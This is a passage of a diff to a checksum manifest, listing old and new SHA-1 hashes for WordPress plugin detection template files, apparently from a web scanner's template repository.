-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:8a64a377b8004a5245b155fc09398af50557518a -http/technologies/wordpress/plugins/formidable.yaml:a4145388d0a9c46978b94b0c5f7a0230519089a6 -http/technologies/wordpress/plugins/forminator.yaml:0d594d3c59c38e1d7c24673b069c42615ed113fb -http/technologies/wordpress/plugins/ga-google-analytics.yaml:61fbfe752cd2bba2f2d9aab1c94be40046fb2e71 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:dcb1bf1418afa07df1cc1efa68048dc41f86bfba +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:782875011c940e8bfc6f8adae8fa40d0387f6fd8 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:5da259c31df2d49b57126273bea164a4b5af7d8f -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:180be91bfb15db5170804c40b657ba164b293d4a -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:2ca6766a791b2af9e5613fc598f507b0c21bcd73 -http/technologies/wordpress/plugins/google-site-kit.yaml:7bb1180989c464283a06b47a2156170450b481f6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:1d88c9760e49035eb5bc68b5f19f75d3f8852e9e -http/technologies/wordpress/plugins/gtranslate.yaml:985bc39410e162745bf18a3153a9771c33f6a49a -http/technologies/wordpress/plugins/gutenberg.yaml:7524df04abffc3abad1d0b98384f01927b73c3b4 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:ed62e3f3c7e94f6716c032550672ea771eed2d32 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:2ce79134ffd98a0c7bb988b09009dc18a4677a90 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:75241d056480c954753d50ce2304c612a130ff7a -http/technologies/wordpress/plugins/header-footer-elementor.yaml:e7815dacb593582057c5c860e6d68d5d6c5d1440 -http/technologies/wordpress/plugins/header-footer.yaml:42aec9ab8b867487e0dd5da21657fb06ca333bd6 -http/technologies/wordpress/plugins/health-check.yaml:e9a2312b2c43c5acfd4605a73695e819983803e9 -http/technologies/wordpress/plugins/hello-dolly.yaml:c1a8a7f49e1bce6e6db42b0ebb1b37b2fac41c5b -http/technologies/wordpress/plugins/host-webfonts-local.yaml:b4f0265ca8c9ddb4baffda53c3eef69407baf8e1 -http/technologies/wordpress/plugins/hostinger.yaml:f445393012ca2c71a7c419afe62730fae26d28c3 -http/technologies/wordpress/plugins/image-optimization.yaml:6b43fb82510f7a94aed998390e2f0f66ca70d641 -http/technologies/wordpress/plugins/imagify.yaml:359c6c42a34cd549c3a9060d211de79c19b3c10f +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:1c6be6bc344e532324a2ddd3909f1a894db83bd8 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff http/technologies/wordpress/plugins/imsanity.yaml:319c06bed3d7611b6a05e2aaa77fb998a3205778 http/technologies/wordpress/plugins/inpost-for-woocommerce.yaml:7544703f23942190d32f575fe3f4b1398dfa3260 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:c124befb00600b249aff3ca4644c33037e538c6d -http/technologies/wordpress/plugins/instagram-feed.yaml:3574c8db3971b4ad18cc194efa2576e3b82c3856 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:96919392adc10cb6a3eed11cdd8b4d1b00bd95cf +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:6622538ae235259d78c4e8e0bc618c4bb8b3ffaa -http/technologies/wordpress/plugins/jetpack.yaml:9d90e4dcfb0665c13e58d9d2a7bc2f694fe7a54a -http/technologies/wordpress/plugins/kadence-blocks.yaml:4eca7bcde888f31a216a4a3566cc7974ad75d0e0 -http/technologies/wordpress/plugins/kirki.yaml:ed7d80eb5cf9b7156e5111055493238f2cd35cb0 -http/technologies/wordpress/plugins/leadin.yaml:47b2f362ac50e6b716ad50f2e747bd2a83febdee -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:2fa3e1cf7ceec777d015c2858697657b9dc7bbdd -http/technologies/wordpress/plugins/limit-login-attempts.yaml:1791401da30bacaefe37f679d6febeec8668a87e -http/technologies/wordpress/plugins/litespeed-cache.yaml:268d5843b4fd75f109db6326634cc3ca15bcb16d -http/technologies/wordpress/plugins/loco-translate.yaml:f0938d221191c80ae9c42ee9fb6cf7abe60d5199 -http/technologies/wordpress/plugins/loginizer.yaml:461696d2aaf8f077090ceb00c913f6d27d853ba4 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:dd4c70abeaf16b18f3350fdf205a35c16f22ef5d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:5426f58dc6ed5a7f34eb70acb628168ce79b65ec -http/technologies/wordpress/plugins/mailpoet.yaml:054857bd7a00912803342af6c0a708c61977085a -http/technologies/wordpress/plugins/maintenance.yaml:8886d19f750d425101bdf6a9cd66b0abc6fb7597 -http/technologies/wordpress/plugins/mainwp-child.yaml:20b9e60bb431cda939f56a6423d47d6b8e602a4d -http/technologies/wordpress/plugins/malcare-security.yaml:4bb5b70c0dbfbebeeaffa4beb71fe998621014c4 -http/technologies/wordpress/plugins/megamenu.yaml:6d932b799eed9979b931177dd0052fedb0e3b2a9 -http/technologies/wordpress/plugins/members.yaml:feeb623b3291c9e85a043939a3f64e33103b8ddd -http/technologies/wordpress/plugins/meta-box.yaml:37642b800f19d024c307a3adc27725ed2939d8eb -http/technologies/wordpress/plugins/metform.yaml:a7abd9091470627c631a68812b0ed1d5d293f428 -http/technologies/wordpress/plugins/ml-slider.yaml:2786b1389bc17cd0bc2b7f0aa80ec59a7bbf5975 -http/technologies/wordpress/plugins/newsletter.yaml:4341d7513be0c810a3d2046263237c2c8b3f474f -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:b7906ef7728546891f601708cfb6fde847e41587 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:374f22d0c0393c09417c3dd6434d49fcc1b1bbf7 -http/technologies/wordpress/plugins/ninja-forms.yaml:58c660a1cd86085d6c707bcc89c1238c132d8787 -http/technologies/wordpress/plugins/ocean-extra.yaml:2eb2cf42d13cc052353d3a738d46f04e98b9b278 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:105eed8a6be7d67e17cf5527f342270b90647c81 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:b785f3a605f7c77e8382b988b465c4de10d640cf -http/technologies/wordpress/plugins/optinmonster.yaml:7b8d4c3532c7f16ff530514e9cafb71329f5bc48 -http/technologies/wordpress/plugins/otter-blocks.yaml:6efde6f2d08cfe85b22f7781fd167784c6c56ed1 -http/technologies/wordpress/plugins/password-protected.yaml:6a03441d49eef6d3dc94706cfb2df3bfe55cca82 -http/technologies/wordpress/plugins/pdf-embedder.yaml:c2da55368776051736703dd3916b713e2ba60167 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:c274f39e569adf0c41b69c94e3e3d6cf50b43817 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:2fb6e282504f3ab516bf8dda5fa84624bec49aea +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:e805aa0f24118a419ba698e01f4040c3e021358d +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:004a5e0e461e2389e4e14e7a5b912b0c0c621a1b -http/technologies/wordpress/plugins/pixelyoursite.yaml:676f16236f3566755b83156cd6abf1c6dccac608 -http/technologies/wordpress/plugins/polylang.yaml:425eb6e1654d9e781cf308fba501c41a926e2bd3 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:ca13c9db85486210d62e6be8b225077bb127c2ad -http/technologies/wordpress/plugins/post-smtp.yaml:10bfb0f2f5bdf3d9fe808839d5401caa44c6e759 -http/technologies/wordpress/plugins/post-types-order.yaml:6b0ffd9abd8204c5ba9efb201525ed22ed4e42f9 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:e58a6005b7afa410193394f329dcb490898f160a -http/technologies/wordpress/plugins/pretty-link.yaml:759bbe695c54ef9c9892888b0acf652a6e23c395 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:be410dd27d4fb7192a3db28e08f6bea582aca158 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8812902897c99760c1ab7ac00bc5624212159e23 -http/technologies/wordpress/plugins/redirection.yaml:2af48fdb7aff667aa4a63cb46f5abd1fe0e08e75 -http/technologies/wordpress/plugins/redux-framework.yaml:9c498507f94157b2fa2cd32e4ae3fa2e6e573b64 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:cae2ee3c2b204c855590d8a051c421cd65c102a0 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:3d3369b47f562b67520802cfa080db4646073292 -http/technologies/wordpress/plugins/safe-svg.yaml:5128757a7d175c03867114cf3d7fa1fa54242b83 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:00bdea82355f90ea0d4237b3f88d58fefc21fcc8 -http/technologies/wordpress/plugins/sg-cachepress.yaml:4ff93573ea2e25e5d4f7550c397aa81f79908070 -http/technologies/wordpress/plugins/sg-security.yaml:a5195b8c2bd318cf957feefad1a75f79633d3579 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:8905329951fb3d611dd3faa964c72649d6a5f7e4 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:ee1d252cccc20ba7b716e958a22782cd4f8d31b2 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:0c189bf523575dd6c6db3a770968fb13af247bd7 -http/technologies/wordpress/plugins/simple-history.yaml:61e1beea473d98dbdc9e0f40ac564ae9c98fc043 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:020ac98ee8b37e204e0935108f9d69e52db78397 +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:61b724210b392636bd4041ff8f0f0bfcaa4c4cb2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:136daa813f9e73ba5a5a57d7a949c477f80d0cb5 -http/technologies/wordpress/plugins/smart-slider-3.yaml:539ae11c7dae47afe524a9fbe56ae9db378cab8b -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:14ab628e8f702cd7c1367f14a09341fe64103080 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:1b506638fa568e33eb4b4d431ac50441e4d2f943 +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:3fd042102a10583754916c91dbfe6e698268a714 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:4f26ba20cab4fe083d8eea2eeb46417a0e7732b0 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:191198d25425778d14b05764ed7bbef90b9b445b -http/technologies/wordpress/plugins/svg-support.yaml:26cf7f4573e8ba2457f39080370bd9b40ad918f1 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:f8df0f026bb8f673623444b335e7e2003b32ccca -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:d60b7235b04f934cdc313e4d3ecf27fa7abf256f -http/technologies/wordpress/plugins/templately.yaml:8c637458e79f951e71fff59191c00379b3c7a2da -http/technologies/wordpress/plugins/the-events-calendar.yaml:154bd36f7353358e92ffa2e0844d0a32500e89c0 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:b4e38fda13a743f392740e8d71a4c1e868f29166 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:32c60ebfb622e02bd6bbd5a22f54c693808baee2 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:de0d056ff24a38b3802c52cfd0cc1cf3ed16c874 -http/technologies/wordpress/plugins/under-construction-page.yaml:8fdc2b4c7b20ee534beef7874d99237c97adf46d +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5435f7bf7cf4d0b67ec0e3981d64d2a4e7707b0b +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:cc7c274cc084f221fd4130ba3db895b473b0c53d +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:9bcced3a0da8ff0608b8b46bbf726c10346b7af1 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:32846e808bcbbaf3ef0cb8ed8ea5fadd6a8b695d -http/technologies/wordpress/plugins/webp-express.yaml:5055c9af095501ffffdad32d8a440156ba282b62 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:043eac3c028644c548b653f26eafaa492cb8609e -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:9c746c9131f4c6a347813095db5370189ef2ae28 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:af25e63f5f7455d8533d6670210db9457b2d2c70 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:0beafe3702576541aab8cd6efd4e6f9c9dc91dc5 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:a97a4f4408388fe8a2a67f69ca6df97850101c68 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d259387ab1e735e3501ec80ad01cfe4e8625feec -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:024946648373e657e791d5d3213c2f851a8f89fe -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:ec22e881d0f0880f2d90844cf5969941152d212b -http/technologies/wordpress/plugins/woocommerce-services.yaml:5256dc71f995b6c616b7c027bee83531648c583b -http/technologies/wordpress/plugins/woocommerce.yaml:7eb5bdee8315c4047349d27b8d157b3cf17a26b2 -http/technologies/wordpress/plugins/wordfence.yaml:ff5b6fc64c14bf6ec51d249d40139cc4bfadfb94 -http/technologies/wordpress/plugins/wordpress-importer.yaml:1bbf50d1a8f3b3ec192572bd74a0d8ef48be5525 -http/technologies/wordpress/plugins/wordpress-seo.yaml:8bfd8fc7eac17d02bc77e87ff86dd23aab595537 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:49084a407d7ac416bedbc5940d670fd21935c127 -http/technologies/wordpress/plugins/wp-crontrol.yaml:beb27da60da805df72ceb038550fbc27c6a6e93f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c5e7c6bd06c61ebd19ac358568782b76c4f80b2d -http/technologies/wordpress/plugins/wp-file-manager.yaml:d5092532cbe7c481f45af27049f903908e9e1950 -http/technologies/wordpress/plugins/wp-google-maps.yaml:954fbfec27814950e2f8555e3090c654a49ff6d0 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:3a15ab7d9a4870e64ea18adbf83393b861a88244 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:788e237f95659ff38a423afc3037b399038716d7 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:f53d7254512a271d0a645c13f7540eba4b2a9d74 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:18b339035c87c87820bda0dc4ccf17b8d7dad887 -http/technologies/wordpress/plugins/wp-optimize.yaml:4b197891fe142ab45d30199db393616fa6f0a6a9 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:5d0fbc2be59b40619decac83eac5ea2bf7a74da1 -http/technologies/wordpress/plugins/wp-reset.yaml:685d26e180755b3bf58d179e82420e4ec0e6785f 